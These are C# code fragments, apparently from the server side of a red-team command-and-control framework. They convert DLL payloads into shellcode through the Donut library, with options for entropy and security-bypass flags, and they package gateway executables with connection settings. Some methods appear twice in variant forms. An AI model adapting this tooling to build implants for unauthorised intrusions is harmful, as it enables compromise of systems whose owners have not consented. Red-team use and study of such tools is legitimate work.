public byte[] GenerateShellcode(byte[] payload, DonutRequest request, Build.Architecture arch) { // donut api requires files var rand = new Random(); var tmpFilename = rand.NextString(16); var tmpPayloadFile = Path.Combine(m_TempPath, tmpFilename + ".dll"); var tmpDonutFile = Path.Combine(m_TempPath, tmpFilename + ".donut"); WriteToFile(payload, tmpPayloadFile); var config = new DonutLibrary.DonutConfig { arch = (int)(arch == Build.Architecture.X64 ? DonutLibrary.Architecture.X64 : DonutLibrary.Architecture.X86), mod_type = (int)(DonutLibrary.ModuleType.DLL), format = (int)request.format, compress = (int)request.compress, entropy = (int)request.entropy, inst_type = (int)DonutLibrary.InstanceType.PIC, input = tmpPayloadFile, output = tmpDonutFile, bypass = (int)request.bypass, inst_len = 0 }; try { DonutLibrary.GenerateShellcode(config); return(File.ReadAllBytes(tmpDonutFile)); } finally { CleanupFile(tmpPayloadFile); CleanupFile(tmpDonutFile); } }
public IActionResult GetGatewayExeArchitecture(Build.Architecture architecture, string name, [FromServices] ICustomizer customizer, [FromServices] GatewaysSyncService gss) { using (var ms = new MemoryStream()) { var rand = new Random(); var agentId = new HexId(rand.NextU64()).ToString(); var nameOrAgentId = name ?? agentId; using (var zipArchive = new ZipArchive(ms, ZipArchiveMode.Create)) { var gatewayEntry = zipArchive.CreateEntry($"Gateway{architecture}_{nameOrAgentId}.exe"); using (var bw = new BinaryWriter(gatewayEntry.Open())) { bw.Write(customizer.GetGateway(architecture)); } var configEntry = zipArchive.CreateEntry("GatewayConfiguration.json"); var config = new JObject() { ["BuildId"] = new HexId(rand.NextU16()).ToString(), ["AgentId"] = agentId, ["Name"] = nameOrAgentId, ["API Bridge IP"] = gss.conf.apiBridge.ipAddress.ToString(), ["API Bridge port"] = gss.conf.apiBridge.port, }; using (var w = new StreamWriter(configEntry.Open())) { w.Write(config.ToString()); } } return(File(ms.ToArray(), "application/zip", $"Gateway_{nameOrAgentId}.zip")); } }
private static string GetBinaryDescription(Build.Architecture arch, bool debug = false) { var config = debug ? "d" : "r"; var ar = arch == Build.Architecture.X64 ? "64" : "86"; return($"{config}{ar}"); }
private string GetBinaryDescription(Build.Architecture arch) { string config; if (this.UseDebugBinaries) { config = "d"; } else if (this.UseRWDIBinaries) { config = "rwdi"; } else { config = "r"; } var ar = arch == Build.Architecture.X64 ? "64" : "86"; return($"{config}{ar}"); }
public byte[] GetGateway(Build.Architecture arch) { var c3FileName = Path.Combine(PayloadTemplateDir, GetGatewayFileName(arch)); return(File.ReadAllBytes(c3FileName)); }
private string GetGatewayFileName(Build.Architecture arch) => String.Format(gatewayFile, GetBinaryDescription(arch));
private string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch) => String.Format(payloadTemplateFiles[binaryType], GetBinaryDescription(arch));
public NewBuild(RelayBuild relayBuild) { BuildId = relayBuild.BuildId; Command = relayBuild.StartupCommands[0].ToObject <Command>().Data; Arch = relayBuild.Arch; }
private static string GetGatewayFileName(Build.Architecture arch, bool debug = false) => String.Format(gatewayFile, GetBinaryDescription(arch, debug));
private static string GetRelayFileName(Build.BinaryType binaryType, Build.Architecture arch, bool debug = false) => String.Format(payloadTemplateFiles[binaryType], GetBinaryDescription(arch, debug));